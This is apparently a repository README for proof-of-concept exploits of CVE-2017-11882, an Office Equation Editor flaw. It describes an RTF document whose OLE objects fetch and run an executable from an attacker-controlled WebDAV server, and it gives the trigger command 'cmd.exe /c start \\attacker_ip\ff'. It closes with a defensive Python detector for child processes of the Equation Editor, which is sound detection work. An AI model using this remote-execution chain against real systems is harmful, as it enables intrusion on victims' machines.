Proof-of-Concept exploits for CVE-2017-11882
Latest commit 34a6595 Nov 29, 2017



MITRE CVE-2017-11882:


Patch analysis:

DEMO PoC exploitation:

webdav_exec CVE-2017-11882

A simple PoC for CVE-2017-11882. This exploit triggers the WebClient service to start and executes a remote file from an attacker-controlled WebDAV server. The reason this approach might be handy is the limit on the length of the executed command. With the help of WebDAV, however, it is possible to launch an arbitrary attacker-controlled executable on a vulnerable machine. The script creates a simple document with several OLE objects. These objects exploit CVE-2017-11882, which results in sequential command execution.

The first command, which triggers the WebClient service start, may look like this:

cmd.exe /c start \\attacker_ip\ff

The attacker-controlled binary path should be a UNC network path:


Usage -u trigger_unc_path -e executable_unc_path -o output_file_name

Sample exploit for CVE-2017-11882 (starting calc.exe as payload)

The example folder holds an .rtf file that exploits the CVE-2017-11882 vulnerability and runs the calculator on the system.
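
Both the WebDAV chain and the calc.exe sample described above run their commands as child processes of the Equation Editor (EQNEDT32.EXE), so process-creation telemetry is a practical detection point. The following is an added example, not code from this repository: it assumes Sysmon-style process-creation field names, and the events, PIDs, the file name sample.exe, the host fileserver and the 192.0.2.10 address are constructed.

```python
import re
from collections import defaultdict

EQUATION_EDITOR = "eqnedt32.exe"  # process that hosts the vulnerable OLE object
# UNC path \\host\share...; also accepts the WebDAV form \\host@port\share.
UNC_RE = re.compile(r'\\\\([\w.\-]+)(?:@[\w@]+)?\\[^\s"]+')

EQN = r"C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE"
# Constructed events using Sysmon Event ID 1 (process creation) field names.
SAMPLE_EVENTS = [
    {"ParentImage": EQN, "ParentProcessId": 4120,
     "CommandLine": r"cmd.exe /c start \\192.0.2.10\ff"},
    {"ParentImage": EQN, "ParentProcessId": 4120,
     "CommandLine": r"cmd.exe /c \\192.0.2.10\ff\sample.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe", "ParentProcessId": 900,
     "CommandLine": r"cmd.exe /c dir \\fileserver\public"},  # benign admin use
    {"ParentImage": EQN, "ParentProcessId": 5200, "CommandLine": "calc.exe"},
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return one finding per Equation Editor instance that spawned children."""
    children = defaultdict(list)
    for ev in events:
        if basename(ev["ParentImage"]) == EQUATION_EDITOR:
            children[ev["ParentProcessId"]].append(ev["CommandLine"])
    findings = []
    for ppid, cmds in children.items():
        hosts = sorted({m.group(1).lower() for c in cmds for m in UNC_RE.finditer(c)})
        findings.append({
            "parent_pid": ppid,
            "commands": cmds,
            "unc_hosts": hosts,
            # Any child of the Equation Editor is unusual; a UNC target or
            # several children in sequence matches the chain described above.
            "severity": "high" if hosts or len(cmds) > 1 else "medium",
        })
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The extracted `unc_hosts` values can be checked against outbound SMB and WebDAV connections from the same host during triage.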